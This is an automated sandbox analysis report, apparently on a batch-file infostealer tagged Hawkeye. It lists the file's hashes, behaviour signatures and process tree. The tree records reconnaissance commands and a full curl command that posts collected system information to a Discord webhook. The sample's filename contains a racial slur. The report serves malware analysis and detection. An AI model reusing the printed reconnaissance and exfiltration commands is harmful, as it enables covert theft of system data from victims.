Analysis
  max time kernel:  105s
  max time network: 128s
  platform:         windows10-2004_x64
  resource:         win10v2004-20250314-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        01/04/2025, 14:44
  static task:      static1
General
  Target: niggagimeinfo.bat
  Size:   732B
  MD5:    a874910a487c124be0f303e1c626091c
  SHA1:   1f160820d42a658baf7b4fa3759847d2acdef6a0
  SHA256: c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987
  SHA512: df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041
Malware Config

Signatures
  Hawkeye family

  Legitimate hosting services abused for malware hosting/C2  (1 TTPs, 2 IoCs)
    flow  ioc
    28    discord.com
    29    discord.com

  Collects information from the system  (1 TTPs, 1 IoCs)
    Uses WMIC.exe to find detailed system information.
    pid   Process
    4788  WMIC.exe

  Gathers network information  (2 TTPs, 2 IoCs)
    Uses commandline utility to view network configuration.
    pid   Process
    2708  ipconfig.exe
    4836  ipconfig.exe

  Gathers system information  (1 TTPs, 1 IoCs)
    Runs systeminfo.exe.
    pid   Process
    5180  systeminfo.exe

  Suspicious use of AdjustPrivilegeToken  (43 IoCs)
    description                          pid   Process
    Token: SeDebugPrivilege              2260  whoami.exe
    Token: SeIncreaseQuotaPrivilege      4788  WMIC.exe
    Token: SeSecurityPrivilege           4788  WMIC.exe
    Token: SeTakeOwnershipPrivilege      4788  WMIC.exe
    Token: SeLoadDriverPrivilege         4788  WMIC.exe
    Token: SeSystemProfilePrivilege      4788  WMIC.exe
    Token: SeSystemtimePrivilege         4788  WMIC.exe
    Token: SeProfSingleProcessPrivilege  4788  WMIC.exe
    Token: SeIncBasePriorityPrivilege    4788  WMIC.exe
    Token: SeCreatePagefilePrivilege     4788  WMIC.exe
    Token: SeBackupPrivilege             4788  WMIC.exe
    Token: SeRestorePrivilege            4788  WMIC.exe
    Token: SeShutdownPrivilege           4788  WMIC.exe
    Token: SeDebugPrivilege              4788  WMIC.exe
    Token: SeSystemEnvironmentPrivilege  4788  WMIC.exe
    Token: SeRemoteShutdownPrivilege     4788  WMIC.exe
    Token: SeUndockPrivilege             4788  WMIC.exe
    Token: SeManageVolumePrivilege       4788  WMIC.exe
    Token: 33                            4788  WMIC.exe
    Token: 34                            4788  WMIC.exe
    Token: 35                            4788  WMIC.exe
    Token: 36                            4788  WMIC.exe
    Token: SeIncreaseQuotaPrivilege      4788  WMIC.exe
    Token: SeSecurityPrivilege           4788  WMIC.exe
    Token: SeTakeOwnershipPrivilege      4788  WMIC.exe
    Token: SeLoadDriverPrivilege         4788  WMIC.exe
    Token: SeSystemProfilePrivilege      4788  WMIC.exe
    Token: SeSystemtimePrivilege         4788  WMIC.exe
    Token: SeProfSingleProcessPrivilege  4788  WMIC.exe
    Token: SeIncBasePriorityPrivilege    4788  WMIC.exe
    Token: SeCreatePagefilePrivilege     4788  WMIC.exe
    Token: SeBackupPrivilege             4788  WMIC.exe
    Token: SeRestorePrivilege            4788  WMIC.exe
    Token: SeShutdownPrivilege           4788  WMIC.exe
    Token: SeDebugPrivilege              4788  WMIC.exe
    Token: SeSystemEnvironmentPrivilege  4788  WMIC.exe
    Token: SeRemoteShutdownPrivilege     4788  WMIC.exe
    Token: SeUndockPrivilege             4788  WMIC.exe
    Token: SeManageVolumePrivilege       4788  WMIC.exe
    Token: 33                            4788  WMIC.exe
    Token: 34                            4788  WMIC.exe
    Token: 35                            4788  WMIC.exe
    Token: 36                            4788  WMIC.exe

  Suspicious use of WriteProcessMemory  (20 IoCs)
    description                       pid   Process  procid_target
    PID 3656 wrote to memory of 2864  3656  cmd.exe  87
    PID 3656 wrote to memory of 2864  3656  cmd.exe  87
    PID 3656 wrote to memory of 2260  3656  cmd.exe  88
    PID 3656 wrote to memory of 2260  3656  cmd.exe  88
    PID 3656 wrote to memory of 5180  3656  cmd.exe  89
    PID 3656 wrote to memory of 5180  3656  cmd.exe  89
    PID 3656 wrote to memory of 4292  3656  cmd.exe  90
    PID 3656 wrote to memory of 4292  3656  cmd.exe  90
    PID 3656 wrote to memory of 4836  3656  cmd.exe  96
    PID 3656 wrote to memory of 4836  3656  cmd.exe  96
    PID 3656 wrote to memory of 4544  3656  cmd.exe  97
    PID 3656 wrote to memory of 4544  3656  cmd.exe  97
    PID 3656 wrote to memory of 2708  3656  cmd.exe  98
    PID 3656 wrote to memory of 2708  3656  cmd.exe  98
    PID 3656 wrote to memory of 2688  3656  cmd.exe  99
    PID 3656 wrote to memory of 2688  3656  cmd.exe  99
    PID 3656 wrote to memory of 4788  3656  cmd.exe  100
    PID 3656 wrote to memory of 4788  3656  cmd.exe  100
    PID 3656 wrote to memory of 4812  3656  cmd.exe  101
    PID 3656 wrote to memory of 4812  3656  cmd.exe  101
Processes
  C:\Windows\system32\cmd.exe  (PID 3656)
    command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\HOSTNAME.EXE  (PID 2864)
      command: hostname

    C:\Windows\system32\whoami.exe  (PID 2260)
      command: whoami
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\systeminfo.exe  (PID 5180)
      command: systeminfo
      - Gathers system information

    C:\Windows\system32\findstr.exe  (PID 4292)
      command: findstr /B /C:"OS Name" /C:"OS Version"

    C:\Windows\system32\ipconfig.exe  (PID 4836)
      command: ipconfig
      - Gathers network information

    C:\Windows\system32\findstr.exe  (PID 4544)
      command: findstr IPv6

    C:\Windows\system32\ipconfig.exe  (PID 2708)
      command: ipconfig
      - Gathers network information

    C:\Windows\system32\findstr.exe  (PID 2688)
      command: findstr IPv4

    C:\Windows\System32\Wbem\WMIC.exe  (PID 4788)
      command: wmic logicaldisk get caption, freespace, size
      - Collects information from the system
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\curl.exe  (PID 4812)
      command: curl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"